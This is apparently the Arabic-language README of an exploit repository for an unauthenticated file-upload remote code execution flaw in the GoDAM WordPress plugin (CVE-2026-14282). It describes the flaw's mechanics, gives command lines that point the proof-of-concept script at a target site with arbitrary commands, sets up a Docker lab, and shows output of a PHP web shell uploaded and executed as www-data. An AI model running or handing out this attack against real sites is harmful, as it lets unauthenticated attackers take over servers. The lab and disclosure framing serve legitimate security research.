
GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)
المؤلف: nullwhisper
حالة الاستخدام: أبحاث أمنية مصرّح بها / التحقق من الثغرات فقط.
إصدارات إضافة GoDAM لووردبريس <= 1.12.2 تسجّل حقل WPForms باسم
godam_record. معالج الرفع save_video_file() مربوط بالإجراء العام
wpforms_process_before_filter، لذلك يعمل قبل أي فحص مصادقة. يثق المعالج في ترويسة
Content-Type التي يتحكم فيها المهاجم، ويقبل ملف PHP طالما يبدأ نوع MIME بـ video/،
ثم ينقله إلى الدليل المُقدَّم عبر الويب wp-content/uploads/godam/wpforms/.
يسمح ذلك لمهاجم بدون مصادقة برفع وتنفيذ كود PHP تعسفي.
.
├── cve_2026_14282_poc.py # السكربت الرئيسي لإثبات المفهوم
├── lab/
│ ├── docker-compose.yml # بيئة ووردبريس مخبرية
│ └── setup.php # ينشئ نموذج WPForms مع حقل GoDAM
├── requirements.txt
└── README.md
pip3 install -r requirements.txt
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
يكتشف السكربت تلقائيًا معرف نموذج WPForms ومعرف حقل GoDAM. إذا كانت الصفحة تحتوي على نماذج متعددة أو فشل الاكتشاف، استخدم:
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
--form-id 4 --field-id 1 --cmd "whoami"
نزّل الإضافات الثغرة (لا تعِد توزيع الملفات الثنائية):
mkdir -p lab/wpforms-lite lab/godam
cd lab/wpforms-lite
wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
unzip wpforms-lite.latest-stable.zip
rm wpforms-lite.latest-stable.zip
cd ../godam
wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
unzip godam.1.12.2.zip
rm godam.1.12.2.zip
cd ../..
شغّل البيئة المخبرية:
cd lab
docker compose up -d
أكمل مثبّت ووردبريس على http://127.0.0.1:8092.
ثبّت وفعّل الإضافات، ثم أنشئ النموذج وصفحة الاختبار:
docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
docker exec -i lab-wpcli-1 php /tmp/setup.php
شغّل سكربت إثبات المفهوم:
python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
تم الاختبار على WordPress 6.8 + WPForms Lite الأحدث + GoDAM 1.12.2.
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED
يحتوي هذا المستودع فقط على سكربت إثبات المفهوم وملفات تنسيق البيئة المخبرية. تم استبعاد الملفات الثنائية للإضافات الثغرة لتجنب تضخيم الحجم ومشكلات التوزيع. نزّل الإصدارات الثغرة المحددة من WordPress.org لبيئتك المخبرية الخاصة.
هذه الأداة مخصصة للاختبار الأمني والبحث المصرّح به فقط. لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود.